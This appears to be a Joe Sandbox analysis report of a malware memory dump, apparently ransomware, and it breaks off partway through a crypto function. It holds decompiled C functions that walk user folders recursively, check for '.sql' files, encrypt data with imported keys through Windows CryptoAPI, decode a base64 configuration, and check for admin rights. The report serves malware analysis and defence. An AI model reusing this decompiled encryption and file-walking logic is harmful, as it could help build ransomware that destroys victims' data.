0x0f4e6d08
0x0f4e6d08
0x00000000
0x0f4e6c40
0x0f4e6c40
0x0f4e6c46
0x0f4e6c49
0x0f4e6c4a
0x00000000
0x00000000
0x00000000
0x0f4e6c4a
0x0f4e6c4e
0x00000000
0x0f4e6c54
0x0f4e6c5a
0x0f4e6c5e
0x00000000
0x0f4e6c64
0x0f4e6c77
0x0f4e6c82
0x0f4e6c86
0x0f4e6c8f
0x0f4e6ca0
0x0f4e6ca4
0x0f4e6cb7
0x0f4e6cce
0x0f4e6cd4
0x0f4e6cde
0x0f4e6cde
0x0f4e6ce9
0x0f4e6ce9
0x0f4e6cef
0x0f4e6cef
0x0f4e6cf3
0x0f4e6cf9
0x0f4e6cfe
0x0f4e6d0a
0x0f4e6d0f
0x00000000
0x0f4e6d0f
0x0f4e6cfe
0x0f4e6c5e
0x0f4e6c4e
0x0f4e6c39
0x00000000
0x0f4e6d12
0x0f4e6d22
0x0f4e6d2d
0x0f4e6d3b

APIs

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F4E6BB2
lstrcatW.KERNEL32(00000000,0F4EFF44), ref: 0F4E6BC4
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F4E6BD2
lstrcmpW.KERNEL32(?,0F4EFF48,?,?), ref: 0F4E6BFC
lstrcmpW.KERNEL32(?,0F4EFF4C,?,?), ref: 0F4E6C12
lstrcatW.KERNEL32(00000000,?), ref: 0F4E6C24
lstrlenW.KERNEL32(00000000,?,?), ref: 0F4E6C2B
lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F4E6C5A
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F4E6C71
GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F4E6C7C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F4E6C9A
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F4E6CAF
lstrlenA.KERNEL32(*******************,?,?), ref: 0F4E6CCE
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F4E6CE9
CloseHandle.KERNEL32(00000000,?,?), ref: 0F4E6CF3
FindNextFileW.KERNEL32(?,?,?,?), ref: 0F4E6D1C
FindClose.KERNEL32(?,?,?), ref: 0F4E6D2D

Strings

.sql, xrefs: 0F4E6C54
*******************, xrefs: 0F4E6CB9, 0F4E6CC9

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
String ID: *******************$.sql
API String ID: 3616287438-58436570
Opcode ID: 31f34bfb89ce3c2a040e6201f8755437fb6cd26d40a3ed7345d423178e3f32b8
Instruction ID: 400edd5373408d188791a79d6f02c4b9b32a64cdb568122f5c55cf6882b8ca66
Opcode Fuzzy Hash: 31f34bfb89ce3c2a040e6201f8755437fb6cd26d40a3ed7345d423178e3f32b8
Instruction Fuzzy Hash: 1F41A231650215ABDB20DF609C48FEF7BBCEF14712F51406AFD01EA242EB78AA15CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E6660 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 89
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0F4E6660(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, intOrPtr _a20) {
				long* _v8;
				long* _v12;
				int _v16;
				char _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long** _t26;
				char* _t31;
				int _t33;
				long _t36;

				EnterCriticalSection(0xf4f2a48);
				_v8 = 0;
				_v12 = 0;
				_t26 =  &_v8;
				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000);
				if(_t26 != 0) {
					L6:
					_v16 = 0;
					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
						_v20 = 0xa;
						_t31 =  &_v20;
						__imp__CryptGetKeyParam(_v12, 8,  &_v28, _t31, 0);
						_v32 = _t31;
						 *_a16 = 0xc8;
						_t33 = _a12;
						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16, _a20);
						_v16 = _t33;
						_v24 = GetLastError();
						if(_v16 == 0) {
							E0F4E36C0(_t34);
						}
					}
					CryptReleaseContext(_v8, 0);
					LeaveCriticalSection(0xf4f2a48);
					return _v16;
				}
				_t36 = GetLastError();
				if(_t36 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t36 != 0) {
					goto L6;
				}
				return 0;
			}

0x0f4e666b
0x0f4e6671
0x0f4e6678
0x0f4e668d
0x0f4e6691
0x0f4e6699
0x0f4e66d1
0x0f4e66d1
0x0f4e66f4
0x0f4e66f6
0x0f4e66ff
0x0f4e670d
0x0f4e6713
0x0f4e6719
0x0f4e6727
0x0f4e6735
0x0f4e673b
0x0f4e6744
0x0f4e674b
0x0f4e6750
0x0f4e6750
0x0f4e674b
0x0f4e675b
0x0f4e6766
0x00000000
0x0f4e676c
0x0f4e669b
0x0f4e66a6
0x00000000
0x0f4e66ca
0x0f4e66b7
0x0f4e66bf
0x00000000
0x0f4e66c8
0x00000000

APIs

EnterCriticalSection.KERNEL32(0F4F2A48,?,0F4E38F4,00000000,00000000,00000000,?,00000800), ref: 0F4E666B
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,?,0F4E38F4,00000000,00000000,00000000), ref: 0F4E6691
GetLastError.KERNEL32(?,0F4E38F4,00000000,00000000,00000000), ref: 0F4E669B
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F4E38F4,00000000,00000000,00000000), ref: 0F4E66B7
CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,0F4E38F4,00000000,00000000), ref: 0F4E66EC
CryptGetKeyParam.ADVAPI32(00000000,00000008,0F4E38F4,0000000A,00000000,?,0F4E38F4,00000000), ref: 0F4E670D
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,0F4E38F4,?,0F4E38F4,00000000), ref: 0F4E6735
GetLastError.KERNEL32(?,0F4E38F4,00000000), ref: 0F4E673E
CryptReleaseContext.ADVAPI32(00000000,00000000,?,0F4E38F4,00000000,00000000), ref: 0F4E675B
LeaveCriticalSection.KERNEL32(0F4F2A48,?,0F4E38F4,00000000,00000000), ref: 0F4E6766

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0F4E6686, 0F4E66AC

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 72144047-1948191093
Opcode ID: bb366308848fb363f8ec2a1f0b3f725c0d05d7638a7babdc6f4053505fcee7fb
Instruction ID: fca20c1e964128342b3ab93449d8c4d0cedbbf63785b19d5f69793b9bc1fa67d
Opcode Fuzzy Hash: bb366308848fb363f8ec2a1f0b3f725c0d05d7638a7babdc6f4053505fcee7fb
Instruction Fuzzy Hash: CD316374A50305BBDB10DFA0DD49FEE7B75AB44712F104549FA01AA281D7B8A614CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E6DF0 Relevance: 13.6, APIs: 9, Instructions: 109
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F4E6DF0(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
				void* _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				struct _WIN32_FIND_DATAW _v616;
				void* _t35;
				signed int _t37;
				int _t39;
				signed int _t42;
				void* _t46;
				signed int* _t48;
				WCHAR* _t53;
				intOrPtr* _t54;
				short _t57;
				WCHAR* _t63;
				void* _t67;

				_v24 = __edx;
				_t63 = __ecx;
				"SVWj@h"();
				if(__eax == 0 || E0F4E6BA0(__ecx) != 0) {
					L17:
					__eflags = 0;
					return 0;
				} else {
					E0F4E6D40(__ecx);
					_t53 =  &(_t63[lstrlenW(__ecx)]);
					_v20 = _t53;
					lstrcatW(_t63, "*");
					_t35 = FindFirstFileW(_t63,  &_v616);
					_t57 = 0;
					_v12 = _t35;
					 *_t53 = 0;
					if(_t35 != 0xffffffff) {
						_t54 = _a12;
						do {
							_t37 = lstrcmpW( &(_v616.cFileName), ".");
							__eflags = _t37;
							if(_t37 != 0) {
								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
								__eflags = _t42;
								if(_t42 != 0) {
									lstrcatW(_t63,  &(_v616.cFileName));
									__eflags = _v616.dwFileAttributes & 0x00000010;
									if(__eflags == 0) {
										_v16 =  *_t54;
										_t46 = E0F4E6AB0(_t63,  &_v616, __eflags, _t57, _a4);
										_t67 = _t67 + 8;
										 *_t54 =  *_t54 + _t46;
										asm("adc [ebx+0x4], edx");
										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
										if(__eflags <= 0) {
											if(__eflags < 0) {
												L12:
												_t48 = _a8;
												 *_t48 =  *_t48 + 1;
												__eflags =  *_t48;
											} else {
												__eflags = _v16 -  *_t54;
												if(_v16 <  *_t54) {
													goto L12;
												}
											}
										}
									} else {
										E0F4E6DF0(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
										_t67 = _t67 + 0xc;
									}
									_t57 = 0;
									__eflags = 0;
									 *_v20 = 0;
								}
							}
							_t39 = FindNextFileW(_v12,  &_v616);
							__eflags = _t39;
						} while (_t39 != 0);
						FindClose(_v12);
						goto L17;
					} else {
						return 0xdeadbeaf;
					}
				}
			}

0x0f4e6dfc
0x0f4e6dff
0x0f4e6e01
0x0f4e6e08
0x0f4e6f36
0x0f4e6f36
0x0f4e6f3c
0x0f4e6e1d
0x0f4e6e1d
0x0f4e6e35
0x0f4e6e38
0x0f4e6e3b
0x0f4e6e45
0x0f4e6e4b
0x0f4e6e4d
0x0f4e6e50
0x0f4e6e56
0x0f4e6e64
0x0f4e6e70
0x0f4e6e7c
0x0f4e6e82
0x0f4e6e84
0x0f4e6e96
0x0f4e6e9c
0x0f4e6e9e
0x0f4e6ea8
0x0f4e6eaa
0x0f4e6eb1
0x0f4e6ee2
0x0f4e6ee5
0x0f4e6eea
0x0f4e6eed
0x0f4e6eef
0x0f4e6ef2
0x0f4e6ef5
0x0f4e6ef7
0x0f4e6f00
0x0f4e6f00
0x0f4e6f03
0x0f4e6f03
0x0f4e6ef9
0x0f4e6efc
0x0f4e6efe
0x00000000
0x00000000
0x0f4e6efe
0x0f4e6ef7
0x0f4e6eb3
0x0f4e6ec7
0x0f4e6ecc
0x0f4e6ecc
0x0f4e6f0e
0x0f4e6f0e
0x0f4e6f10
0x0f4e6f10
0x0f4e6e9e
0x0f4e6f1d
0x0f4e6f23
0x0f4e6f23
0x0f4e6f2e
0x00000000
0x0f4e6e58
0x0f4e6e63
0x0f4e6e63
0x0f4e6e56

APIs

Part of subcall function 0F4E6780: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F4E6E06,00000000,?,?), ref: 0F4E6793
Part of subcall function 0F4E6780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F4E6E06,00000000,?,?), ref: 0F4E685A
Part of subcall function 0F4E6780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F4E6E06,00000000,?,?), ref: 0F4E6874
Part of subcall function 0F4E6780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F4E6E06,00000000,?,?), ref: 0F4E688E
Part of subcall function 0F4E6780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F4E6E06,00000000,?,?), ref: 0F4E68A8

Part of subcall function 0F4E6BA0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F4E6BB2
Part of subcall function 0F4E6BA0: lstrcatW.KERNEL32(00000000,0F4EFF44), ref: 0F4E6BC4
Part of subcall function 0F4E6BA0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F4E6BD2
Part of subcall function 0F4E6BA0: lstrcmpW.KERNEL32(?,0F4EFF48,?,?), ref: 0F4E6BFC
Part of subcall function 0F4E6BA0: lstrcmpW.KERNEL32(?,0F4EFF4C,?,?), ref: 0F4E6C12
Part of subcall function 0F4E6BA0: lstrcatW.KERNEL32(00000000,?), ref: 0F4E6C24
Part of subcall function 0F4E6BA0: lstrlenW.KERNEL32(00000000,?,?), ref: 0F4E6C2B
Part of subcall function 0F4E6BA0: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F4E6C5A
Part of subcall function 0F4E6BA0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F4E6C71
Part of subcall function 0F4E6BA0: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F4E6C7C
Part of subcall function 0F4E6BA0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F4E6C9A
Part of subcall function 0F4E6BA0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F4E6CAF

Part of subcall function 0F4E6D40: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0F4E6E22,00000000,?,?), ref: 0F4E6D55
Part of subcall function 0F4E6D40: wsprintfW.USER32 ref: 0F4E6D63
Part of subcall function 0F4E6D40: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0F4E6D7F
Part of subcall function 0F4E6D40: GetLastError.KERNEL32(?,?), ref: 0F4E6D8C
Part of subcall function 0F4E6D40: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F4E6DD8

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F4E6E23
lstrcatW.KERNEL32(00000000,0F4EFF44), ref: 0F4E6E3B
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F4E6E45
lstrcmpW.KERNEL32(?,0F4EFF48,?,?), ref: 0F4E6E7C
lstrcmpW.KERNEL32(?,0F4EFF4C,?,?), ref: 0F4E6E96
lstrcatW.KERNEL32(00000000,?), ref: 0F4E6EA8
lstrcatW.KERNEL32(00000000,0F4EFF7C), ref: 0F4E6EB9
FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F4E6F1D
FindClose.KERNEL32(00003000,?,?), ref: 0F4E6F2E

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: File$lstrcatlstrcmp$FindFolderPathSpecialVirtual$Alloclstrlen$CreateFirst$CloseErrorFreeLastNextReadSizewsprintf
String ID:
API String ID: 664581897-0
Opcode ID: bcf2708130f6030358391dbb7b475b1ca1df578b185b9cfd13b1bf626c8e6cd7
Instruction ID: 82a98b08583d997bc7d25ca5ee52573844497d17e21650e33aedff8c04bcf2b4
Opcode Fuzzy Hash: bcf2708130f6030358391dbb7b475b1ca1df578b185b9cfd13b1bf626c8e6cd7
Instruction Fuzzy Hash: 8731C431A1021DABCF10DF64DC849EEBBB9EF54322F054197ED05DB242EB34AA10CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E34F0 Relevance: 12.1, APIs: 8, Instructions: 79
memorystringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F4E34F0(CHAR* __ecx, WCHAR** __edx, WCHAR** _a4) {
				int _v8;
				CHAR* _v12;
				WCHAR** _v16;
				long _t11;
				WCHAR* _t17;
				WCHAR* _t18;
				void* _t23;
				void* _t28;
				int _t29;
				WCHAR** _t30;

				_v16 = __edx;
				_v12 = __ecx;
				_t29 = 0;
				_t11 = lstrlenA(__ecx);
				_v8 = _t11;
				_t23 = VirtualAlloc(0, _t11, 0x3000, 4);
				if(_t23 != 0) {
					if(CryptStringToBinaryA(_v12, 0, 1, _t23,  &_v8, 0, 0) != 0) {
						_t17 = VirtualAlloc(0, 0x100, 0x3000, 4);
						_t30 = _v16;
						 *_t30 = _t17;
						_t18 = VirtualAlloc(0, 0x100, 0x3000, 4);
						_t28 = _t23;
						 *_a4 = _t18;
						if( *_t23 != 0x3b) {
							do {
								_t28 = _t28 + 1;
							} while ( *_t28 != 0x3b);
						}
						 *_t28 = 0;
						wsprintfW( *_t30, L"%S", _t23);
						_t8 = _t28 + 1; // 0x2
						wsprintfW( *_a4, L"%S", _t8);
						_t29 = 1;
					}
					VirtualFree(_t23, 0, 0x8000);
				}
				return _t29;
			}

0x0f4e34fa
0x0f4e34ff
0x0f4e3502
0x0f4e3504
0x0f4e3519
0x0f4e351e
0x0f4e3522
0x0f4e353d
0x0f4e354c
0x0f4e354e
0x0f4e355f
0x0f4e3561
0x0f4e3566
0x0f4e356b
0x0f4e356d
0x0f4e3570
0x0f4e3570
0x0f4e3571
0x0f4e3570
0x0f4e3584
0x0f4e3587
0x0f4e3589
0x0f4e3597
0x0f4e359c
0x0f4e359c
0x0f4e35a9
0x0f4e35a9
0x0f4e35b7

APIs

lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,0F4E3673,00000000), ref: 0F4E3504
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,0F4E3673,00000000), ref: 0F4E351C
CryptStringToBinaryA.CRYPT32(0F4E3673,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0F4E3535
VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,?,0F4E3673,00000000), ref: 0F4E354C
VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,?,0F4E3673,00000000), ref: 0F4E3561
wsprintfW.USER32 ref: 0F4E3587
wsprintfW.USER32 ref: 0F4E3597
VirtualFree.KERNEL32(00000000,00000000,00008000,?,0F4E3673,00000000), ref: 0F4E35A9

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$BinaryCryptFreeStringlstrlen
String ID:
API String ID: 2885909284-0
Opcode ID: 9d1f597334e5a84b2ec7015831720cbfeb99a6a05ed7f74d4a08e883c5f87bba
Instruction ID: 36d30bb681d0f45c30df5a98db4d3a07241e6e5ecf5f3c204ab7588a558d8d75
Opcode Fuzzy Hash: 9d1f597334e5a84b2ec7015831720cbfeb99a6a05ed7f74d4a08e883c5f87bba
Instruction Fuzzy Hash: E621A571A413197FEB129F648C41F9BBFACEF45761F100066FA44EB2C1D7B56A108B94

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E3C70 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0F4E3C70() {
				signed int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				int _t13;
				_Unknown_base(*)()* _t15;
				signed int _t16;

				_v20.Value = 0;
				_v16 = 0x500;
				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				if(_t13 != 0) {
					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
					_t16 =  *_t15(0, _v12,  &_v8);
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t16;
					FreeSid(_v12);
					return _v8;
				} else {
					return _t13;
				}
			}

0x0f4e3c79
0x0f4e3c99
0x0f4e3ca0
0x0f4e3ca8
0x0f4e3cbf
0x0f4e3cce
0x0f4e3cd5
0x0f4e3cd7
0x0f4e3cda
0x0f4e3ce6
0x0f4e3cad
0x0f4e3cad
0x0f4e3cad

APIs

AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F4E3CA0
GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0F4E3CB3
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0F4E3CBF
FreeSid.ADVAPI32(?), ref: 0F4E3CDA

Strings

CheckTokenMembership, xrefs: 0F4E3CB9
advapi32.dll, xrefs: 0F4E3CAE

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: AddressAllocateFreeHandleInitializeModuleProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 3309497720-1888249752
Opcode ID: ab779d4f9042f3f4be524ef93880ec0b562d5dd03b57262d699adce0f6b8a686
Instruction ID: 33fba1ca3e849e26225e6fe06ef2d150c58112b86d57e19fd6e20bee654f54b7
Opcode Fuzzy Hash: ab779d4f9042f3f4be524ef93880ec0b562d5dd03b57262d699adce0f6b8a686
Instruction Fuzzy Hash: 92F04F30A80309BBEB00DFE4DC0AFFDBB78EB04716F104585FD01AA182E77466148B51

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E3200 Relevance: 8.8, APIs: 7, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F4E3200(void* __ecx, CHAR* _a4, intOrPtr _a8) {
				char _t5;
				char _t6;
				intOrPtr _t8;
				int _t10;
				CHAR* _t13;
				int _t15;
				void* _t18;
				CHAR* _t21;
				CHAR* _t23;

				_t23 = _a4;
				_t18 = __ecx;
				_t5 =  *_t23;
				if(_t5 == 0) {
					L4:
					_t6 =  *_t23;
					if(_t6 == 0x7d) {
						goto L10;
					} else {
						_t21 = _t23;
						if(_t6 != 0) {
							while( *_t21 != 0x7d) {
								_t21 =  &(_t21[1]);
								if( *_t21 != 0) {
									continue;
								} else {
								}
								goto L12;
							}
							 *_t21 = 0;
						}
						L12:
						_t8 = _a8;
						if(_t8 != 1) {
							if(_t8 == 2) {
								_t10 = lstrlenA(_t23);
								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
								 *(_t18 + 8) = _t13;
								goto L16;
							}
						} else {
							_t15 = lstrlenA(_t23);
							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
							 *(_t18 + 4) = _t13;
							L16:
							if(_t13 != 0) {
								lstrcpyA(_t13, _t23);
							}
						}
						 *_t21 = 0x7d;
						return 1;
					}
				} else {
					while(_t5 != 0x7d) {
						_t23 =  &(_t23[1]);
						if(_t5 == 0x3d) {
							goto L4;
						} else {
							_t5 =  *_t23;
							if(_t5 != 0) {
								continue;
							} else {
								goto L4;
							}
						}
						goto L19;
					}
					L10:
					return 0;
				}
				L19:
			}

0x0f4e3205
0x0f4e3208
0x0f4e320a
0x0f4e320e
0x0f4e321f
0x0f4e321f
0x0f4e3223
0x00000000
0x0f4e3225
0x0f4e3226
0x0f4e322a
0x0f4e3230
0x0f4e3235
0x0f4e3239
0x00000000
0x00000000
0x0f4e323b
0x00000000
0x0f4e3239
0x0f4e3245
0x0f4e3245
0x0f4e3248
0x0f4e3248
0x0f4e324e
0x0f4e3270
0x0f4e3273
0x0f4e3284
0x0f4e328a
0x00000000
0x0f4e328a
0x0f4e3250
0x0f4e3251
0x0f4e3262
0x0f4e3268
0x0f4e328d
0x0f4e328f
0x0f4e3293
0x0f4e3293
0x0f4e328f
0x0f4e3299
0x0f4e32a5
0x0f4e32a5
0x0f4e3210
0x0f4e3210
0x0f4e3214
0x0f4e3217
0x00000000
0x0f4e3219
0x0f4e3219
0x0f4e321d
0x00000000
0x00000000
0x00000000
0x00000000
0x0f4e321d
0x00000000
0x0f4e3217
0x0f4e323e
0x0f4e3242
0x0f4e3242
0x00000000

APIs

lstrlenA.KERNEL32(0F4E5444,00000000,?,0F4E5445,?,0F4E34BF,0F4E5445,00000001,0F4E5445,00000000,00000000,00000000,?,?,0F4E5444,00000000), ref: 0F4E3251
GetProcessHeap.KERNEL32(00000008,00000001,?,0F4E34BF,0F4E5445,00000001,0F4E5445,00000000,00000000,00000000,?,?,0F4E5444,00000000), ref: 0F4E325B
HeapAlloc.KERNEL32(00000000,?,0F4E34BF,0F4E5445,00000001,0F4E5445,00000000,00000000,00000000,?,?,0F4E5444,00000000), ref: 0F4E3262
lstrlenA.KERNEL32(0F4E5444,00000000,?,0F4E5445,?,0F4E34BF,0F4E5445,00000001,0F4E5445,00000000,00000000,00000000,?,?,0F4E5444,00000000), ref: 0F4E3273
GetProcessHeap.KERNEL32(00000008,00000001,?,0F4E34BF,0F4E5445,00000001,0F4E5445,00000000,00000000,00000000,?,?,0F4E5444,00000000), ref: 0F4E327D
HeapAlloc.KERNEL32(00000000,?,0F4E34BF,0F4E5445,00000001,0F4E5445,00000000,00000000,00000000,?,?,0F4E5444,00000000), ref: 0F4E3284
lstrcpyA.KERNEL32(00000000,0F4E5444,?,0F4E34BF,0F4E5445,00000001,0F4E5445,00000000,00000000,00000000,?,?,0F4E5444,00000000), ref: 0F4E3293

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrlen$lstrcpy
String ID:
API String ID: 511007297-0
Opcode ID: 566f31bc7062f24bc728d908948115c3749e35c18ad87cef5a8286736465e6c8
Instruction ID: 40b1c8222457d1feb860f25d20d5f2b89c542dbf754f5ce0bf3015b08714a965
Opcode Fuzzy Hash: 566f31bc7062f24bc728d908948115c3749e35c18ad87cef5a8286736465e6c8
Instruction Fuzzy Hash: 711193304042956BDB224F6898087F7BF99AF02362F644547ECC5CF343C73D98568761

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E1C20 Relevance: .7, Instructions: 721
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0F4E1C20(signed int* __ebx, signed int* __edi, signed int* __esi) {
				signed int _t514;
				signed char _t522;
				signed char _t530;
				signed char _t538;
				signed char _t546;
				signed char _t554;
				signed char _t562;
				signed char _t570;
				signed char _t578;
				signed char _t586;
				void* _t595;
				signed char _t603;
				signed char _t618;
				signed int _t628;
				signed char _t630;
				signed char _t631;
				signed char _t633;
				signed char _t635;
				signed char _t636;
				signed char _t638;
				signed char _t640;
				signed char _t641;
